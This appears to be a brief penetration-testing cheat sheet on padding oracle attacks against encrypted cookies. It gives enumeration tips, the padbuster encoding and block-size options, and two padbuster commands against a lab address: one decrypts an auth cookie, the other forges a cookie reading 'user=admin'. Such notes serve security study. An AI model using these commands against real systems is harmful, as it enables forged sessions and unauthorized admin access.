Enumeration
Cookies
Try appending characters to the cookie to see how padding errors change.
Check if the cookie length is a multiple of the block size (16 bytes for AES) to confirm block cipher usage.
Padbuster
Encoding
0 -> Base64
0
1 -> Lower Hex
1
2 -> Upper Hex
2
3 -> NET UrlToken
3
4 -> WebSafe Base64
4
Block-Size
8
16
padbuster http://10.10.10.18/index.php xZppyvnbCmlM%2BgjyBRADsRODCgiRTQ4%2B 8 -cookies auth=xZppyvnbCmlM%2BgjyBRADsRODCgiRTQ4%2B -encoding 0
padbuster http://10.10.10.18/index.php xZppyvnbCmlM%2BgjyBRADsRODCgiRTQ4%2B 8 -cookies auth=xZppyvnbCmlM%2BgjyBRADsRODCgiRTQ4%2B -encoding 0 -plaintext user=admin
Last updated 9 days ago